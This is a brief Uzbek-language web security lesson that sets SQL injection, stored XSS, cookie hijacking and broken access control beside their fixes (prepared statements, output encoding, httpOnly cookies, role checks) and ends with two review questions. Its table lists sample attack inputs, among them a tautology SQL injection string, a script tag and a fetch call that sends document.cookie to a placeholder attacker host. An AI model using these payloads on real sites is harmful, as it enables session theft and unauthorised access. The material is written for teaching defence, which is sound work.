Zaif veb-ilovadagi SQL Injection va XSS zaifliklarini aniqlash, ularni sinab ko'rish va parametrlangan so'rovlar (Prepared Statements) hamda HTML sanitizatsiya orqali butunlay bartaraf etish.
| Zaiflik Turi | Xaker Exploit Matni | Himoyalangan Kod / Yechim | Holat |
|---|---|---|---|
| 1. SQL Injection | `' OR '1'='1' --` | `db.query(sql, [username, pass])` | ✅ Tuzatildi |
| 2. Stored XSS | `<script>steal()</script>` | `textContent` yoki HTML Entity Encoding | |
| 3. Cookie Hijacking | `fetch(attacker + document.cookie)` | `httpOnly: true` (JS o'qiy olmaydi) | |
| 4. Broken Access | `/admin/users (ruxsatsiz)` | Middleware da `role === 'admin'` tekshirish |
1. Nega oddiy qo'shtirnoq (') belgisi ma'lumotlar bazasi sintaksisini buzadi va Prepared Statements buni qanday hal qiladi?
2. Agar Cookie-da 'httpOnly: true' flagi bo'lsa, xaker XSS orqali sessiya tokenini o'g'irlay oladimi? Tushuntiring.